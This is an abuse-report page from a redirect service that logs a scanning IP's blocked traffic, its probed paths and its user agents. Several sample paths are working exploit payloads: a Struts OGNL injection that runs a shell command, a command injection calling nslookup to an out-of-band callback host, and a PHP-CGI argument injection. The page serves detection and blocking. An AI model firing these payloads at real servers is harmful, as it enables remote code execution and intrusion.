abuseip.org
- Reason
- suspicious paths across 1 domains
- Hits (last hour)
- 53
- Unique targets hit
- 1
- Unique paths probed
- 1,193
- Detection count
- 12
- First seen
- 2026-07-14 08:57:20 UTC
- Last seen
- 2026-07-14 09:12:43 UTC
- Block expires
- 2026-07-15 10:05:54 UTC
Sample paths probed
- /wls-wsat/RegistrationRequesterPortType
- /cgi-bin/stats
- /wp-content/plugins/delightful-downloads/assets/vendor/jqueryFileTree/connectors/jqueryFileTree.php
- /index.action?redirectAction:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}
- /esp/cms_changeDeviceContext.esp?device=aaaaa:a%27";user|s."1337";
- /cgi-bin/test
- /cgi-bin/status
- /KaseyaCwWebService/ManagedIT.asmx
- /test.cgi
- /scripts/setup.php
- /cgi-bin/status/status.cgi
- /boardDataWW.php
- /cgi-bin/test.cgi
- /
- /debug.cgi
- /cgi-bin/test-cgi
- /javax.faces.resource/dynamiccontent.properties.xhtml
- /webadmin/script?command=|%20nslookup%20d9avk1fodv3keqqfn1k0jzbyycbs7x56z.oast.fun
- /RPC2
- /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input
Sample User-Agents
- VulnScout (security research; [email protected]; https://vulnscout.com/coordinated-disclosure/)
- Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.10240
What does this mean?
This address sent traffic that the redirs.com edge classified as automated abuse โ typically WordPress/PHP exploit scanning, credential file probing (.env, .git, .aws/), or mass-domain enumeration. The block is automatic and time-limited (24 hours from last detection).
If you believe this is a false positive, contact [email protected] with the IP and the timestamps above.